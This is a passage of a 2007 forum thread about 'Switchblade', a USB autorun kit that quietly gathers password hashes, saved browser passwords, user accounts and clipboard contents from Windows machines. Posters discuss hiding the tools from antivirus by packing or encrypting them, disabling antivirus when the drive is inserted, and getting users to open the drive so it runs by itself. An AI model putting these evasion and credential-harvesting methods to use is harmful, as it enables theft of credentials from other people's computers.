NetStumbler.org Forums

Go Back   NetStumbler.org Forums > WiFi Forums > Hardware
Register Search Today's Posts Mark Forums Read

Reply
 
LinkBack Thread Tools Display Modes
Old 04-02-2007   #16 (permalink)
beakmyn
root\.workspace\.garbage.
 
Join Date: Aug 2003
Posts: 4,796
Quote:
Originally Posted by theprez98
PackageFactory for U3

convert applications to run on U3

I have some 200 applications And some others that have to be zipped with a password so that the overzealous antivirus doesn't delete them. Until I can find a freeware encrypter.
__________________
Daughter with arms inside shirt: "Daddy I'm not Armish"

┌──────────────────────────────┐
NS Icons Explained|et hoc genus omne
└──────────────────────────────┘
beakmyn is offline   Reply With Quote
Old 04-02-2007   #17 (permalink)
DaKahuna
Dirty Ol' Man
 
DaKahuna's Avatar
 
Join Date: Jan 2006
Location: If you find out, let me know!
Posts: 421
I have taken a spare SanDisk mini cruiser and am running Switchblad on it. When I plug it into my Windows XP box at work which is running McAfee AV and AS, the pwdump file is being deleted and the log file shows everything collected except the password dumps. I guess that is a good thing !!

Anyone have a version of PWDump that does not get deleted by AV/AS products?
DaKahuna is offline   Reply With Quote
Old 04-02-2007   #18 (permalink)
theprez98
SpoonfeederExtraordinaire
 
theprez98's Avatar
 
Join Date: Jan 2005
Location: Maryland
Posts: 3,619
Quote:
Originally Posted by DaKahuna
Anyone have a version of PWDump that does not get deleted by AV/AS products?
Yes and no. I have an encrypted version that Symantec ignored at home, but found here at work. I haven't checked versions though to compare. Either way, you definitely need some form of encrpyter or file packer. Somewhere there is also a avkill.exe(?) that disables some AV products (free stuff mostly).
__________________
:00475160 0E A6 AE A0 19 E3 A3 46 .......F
:00475168 0D 65 17 0C 53 70 6F 6F .e..Spoo
:00475170 6E 66 65 65 64 65 72 2E nfeeder.
:00475178 45 78 74 72 61 6F 72 64 Extraord
:00475180 69 6E 61 69 72 65 5D 3B inaire];
:00475188 8B 9E 92 5A FF 5D A6 F0 ...Z.]..
theprez98 is offline   Reply With Quote
Old 04-02-2007   #19 (permalink)
theprez98
SpoonfeederExtraordinaire
 
theprez98's Avatar
 
Join Date: Jan 2005
Location: Maryland
Posts: 3,619
Quote:
Originally Posted by beakmyn
I have some 200 applications And some others that have to be zipped with a password so that the overzealous antivirus doesn't delete them. Until I can find a freeware encrypter.
I'm looking for something as well. The key being if it is a popular encrypter, Symantec probably already knows about it.
__________________
:00475160 0E A6 AE A0 19 E3 A3 46 .......F
:00475168 0D 65 17 0C 53 70 6F 6F .e..Spoo
:00475170 6E 66 65 65 64 65 72 2E nfeeder.
:00475178 45 78 74 72 61 6F 72 64 Extraord
:00475180 69 6E 61 69 72 65 5D 3B inaire];
:00475188 8B 9E 92 5A FF 5D A6 F0 ...Z.]..
theprez98 is offline   Reply With Quote
Old 04-02-2007   #20 (permalink)
DaKahuna
Dirty Ol' Man
 
DaKahuna's Avatar
 
Join Date: Jan 2006
Location: If you find out, let me know!
Posts: 421
I hear that. Okay, Let me see what I can come up with and we can compare notes later. Disabling AV is not how I would want to do it. I would prefer something undetected.
DaKahuna is offline   Reply With Quote
Old 04-02-2007   #21 (permalink)
Barry
Managing the iTards.
 
Barry's Avatar
 
Join Date: Dec 2002
Location: Ohio
Posts: 5,367
Just to let you know, they do work with Vista, you just have to get them to brows the folder.
__________________
Atheism is a non-prophet organization.
Barry is offline   Reply With Quote
Old 04-02-2007   #22 (permalink)
theprez98
SpoonfeederExtraordinaire
 
theprez98's Avatar
 
Join Date: Jan 2005
Location: Maryland
Posts: 3,619
Quote:
Originally Posted by DaKahuna
I hear that. Okay, Let me see what I can come up with and we can compare notes later. Disabling AV is not how I would want to do it. I would prefer something undetected.
Exactly. However, if you could write part of the batch file to automatically disable the AV program upon inserting the usb drive, that would serve the same purpose.
__________________
:00475160 0E A6 AE A0 19 E3 A3 46 .......F
:00475168 0D 65 17 0C 53 70 6F 6F .e..Spoo
:00475170 6E 66 65 65 64 65 72 2E nfeeder.
:00475178 45 78 74 72 61 6F 72 64 Extraord
:00475180 69 6E 61 69 72 65 5D 3B inaire];
:00475188 8B 9E 92 5A FF 5D A6 F0 ...Z.]..
theprez98 is offline   Reply With Quote
Old 04-02-2007   #23 (permalink)
theprez98
SpoonfeederExtraordinaire
 
theprez98's Avatar
 
Join Date: Jan 2005
Location: Maryland
Posts: 3,619
Quote:
Originally Posted by Barry
Just to let you know, they do work with Vista, you just have to get them to brows the folder.
That's the same concept that works with non-U3 drives. If you can get the person to browse the folder it will automatically launch the go file (at least that's how I understand it).
__________________
:00475160 0E A6 AE A0 19 E3 A3 46 .......F
:00475168 0D 65 17 0C 53 70 6F 6F .e..Spoo
:00475170 6E 66 65 65 64 65 72 2E nfeeder.
:00475178 45 78 74 72 61 6F 72 64 Extraord
:00475180 69 6E 61 69 72 65 5D 3B inaire];
:00475188 8B 9E 92 5A FF 5D A6 F0 ...Z.]..
theprez98 is offline   Reply With Quote
Old 04-02-2007   #24 (permalink)
beakmyn
root\.workspace\.garbage.
 
Join Date: Aug 2003
Posts: 4,796
Quote:
Originally Posted by theprez98
Exactly. However, if you could write part of the batch file to automatically disable the AV program upon inserting the usb drive, that would serve the same purpose.

Mcafee Enterprise automatically enables itself if disabled after a few minutes. And it's a PITA if you're trying to compress/encrypt/pack a file and it deletes it on you!

Oh and Get Pstart U3 edition
Install it
Move your current Pstart.xml file \<UUID>\Data and rename it as Settings.xml
Move all your files to \<UUID>\Data and Pstart functions just fine (download the version from author of pstart instead of using a packager)
Ejecting the drive will shutdown pstart for you.

<UUID> is the unique id assigned by launcher
__________________
Daughter with arms inside shirt: "Daddy I'm not Armish"

┌──────────────────────────────┐
NS Icons Explained|et hoc genus omne
└──────────────────────────────┘

Last edited by beakmyn : 04-02-2007 at 01:36 PM.
beakmyn is offline   Reply With Quote
Old 04-24-2007   #25 (permalink)
beakmyn
root\.workspace\.garbage.
 
Join Date: Aug 2003
Posts: 4,796
Based on Amish MaxDamage

So I've been having fun and tweaking it. If you want it here it is.
I'll be adding a U3 package and letting the built autorun in U3 launchpad run it.

http://www.frontiernet.net/~wardrive...witchblade.zip

!switchblade#


Added:

net share
net user
cleaned up code and fixed a couple bugs
Firepassword
different pwdump version (also experimenting with fgdump)
clipboard contents
nircmd to play 2600 Hz tone when done

Looking into using removedrive to perform self-eject when done (it copies itself to temp if called from running drive)
__________________
Daughter with arms inside shirt: "Daddy I'm not Armish"

┌──────────────────────────────┐
NS Icons Explained|et hoc genus omne
└──────────────────────────────┘

Last edited by beakmyn : 04-24-2007 at 01:26 PM.
beakmyn is offline   Reply With Quote
Old 04-28-2007   #26 (permalink)
beakmyn
root\.workspace\.garbage.
 
Join Date: Aug 2003
Posts: 4,796
Barry's got one now too

only it cost $499.00
http://gizmodo.com/gadgets/tell-me-where-the-bomb-is/
__________________
Daughter with arms inside shirt: "Daddy I'm not Armish"

┌──────────────────────────────┐
NS Icons Explained|et hoc genus omne
└──────────────────────────────┘
beakmyn is offline   Reply With Quote
Old 04-28-2007   #27 (permalink)
Barry
Managing the iTards.
 
Barry's Avatar
 
Join Date: Dec 2002
Location: Ohio
Posts: 5,367
Quote:
Originally Posted by beakmyn

I wish. I wonder if they would count school computer technicians as "investigators"? They only sell to law enforcement. On a side... A while back when linux was still being ported the iPods, some one had a proof of concept app that ran on them. You could plug your iPod running linux into a mac's firewire port and pull the shadow file from a machine that was locked. I don't know if they ever released it or not.
__________________
Atheism is a non-prophet organization.

Last edited by Barry : 04-28-2007 at 01:20 PM.
Barry is offline   Reply With Quote
Old 05-14-2007   #28 (permalink)
beakmyn
root\.workspace\.garbage.
 
Join Date: Aug 2003
Posts: 4,796
Looks like someone is marketing the Max Damage Switchblade / Back orifice

http://www.snoopstick.com/
__________________
Daughter with arms inside shirt: "Daddy I'm not Armish"

┌──────────────────────────────┐
NS Icons Explained|et hoc genus omne
└──────────────────────────────┘
beakmyn is offline   Reply With Quote
Old 05-14-2007   #29 (permalink)
theprez98
SpoonfeederExtraordinaire
 
theprez98's Avatar
 
Join Date: Jan 2005
Location: Maryland
Posts: 3,619
Quote:
Originally Posted by beakmyn
Looks like someone is marketing the Max Damage Switchblade / Back orifice

http://www.snoopstick.com/
Unfortunately, it was only a matter of time.
__________________
:00475160 0E A6 AE A0 19 E3 A3 46 .......F
:00475168 0D 65 17 0C 53 70 6F 6F .e..Spoo
:00475170 6E 66 65 65 64 65 72 2E nfeeder.
:00475178 45 78 74 72 61 6F 72 64 Extraord
:00475180 69 6E 61 69 72 65 5D 3B inaire];
:00475188 8B 9E 92 5A FF 5D A6 F0 ...Z.]..
theprez98 is offline   Reply With Quote
Old 05-17-2007   #30 (permalink)
ccie4526
My search-fu is weak!
 
ccie4526's Avatar
 
Join Date: Jun 2002
Location: West BFE, Texas
Posts: 419
Put beakmyn's zip onto my non-U3 Apacer, have plugged into several machines, and rooted only one. Thus, thinking I need to do U3 after all.

Saw the Cruzer Micro 1Gb at WalMart last week for $19.99, looked like regular price. Guess I'm gonna have to break down and get one.
__________________
---
<#include std.disclaimer.h>
AltarThug of Wired and Unwired, The Church of WiFi
http://www.churchofwifi.org
http://www.linuxisforbitches.com
http://www.wigle.net
http://www.kismetwireless.net
ccie4526 is offline   Reply With Quote
Reply


Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On



Google
 
Web NetStumbler.org

All times are GMT -7. The time now is 06:43 AM.


Powered by vBulletin® Version 3.6.8
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.0.0 ©2007, Crawlability, Inc.


All messages express the views of the author and are for entertainment purposes only. Netstumbler.org cannot be held responsible for the authenticity of the content or the actions of its members. By using this site and its services, you warrant that you will not post any messages that are discriminating, obscene, hateful, threatening, or otherwise violates any laws and you release Netstumbler.org from any future claims of any kind whatsoever including, but not limited to, addiction and loss of productivity. All forum messages, private messages and any other content are properties of Netstumbler.org. Even if publicly available, personal or copyrighted information are not to be posted without the consent of the owner. Distribution of licensed and copyrighted materials in any way not endorsed by the copyright owner is strictly prohibited. You may not use this site and its resources to spam other sites or individuals or perform any action that violates any law. Items sold or bought in the For Sale forum are sold as is and no warranty or insurance of any kind is provided. Netstumbler.org cannot be held responsible for the outcome of any transactions and no warranty of any kind is provided, either express or implied. Vulgar words are not allowed in the subject lines ; they may be used in the message body in any forum. The Administrator, Super Moderators and Moderators of Netstumbler.org have the right to remove, edit, move or close any thread for any reason and to reveal your identity and other known information in the event of a complaint or legal action arising from any message posted by you.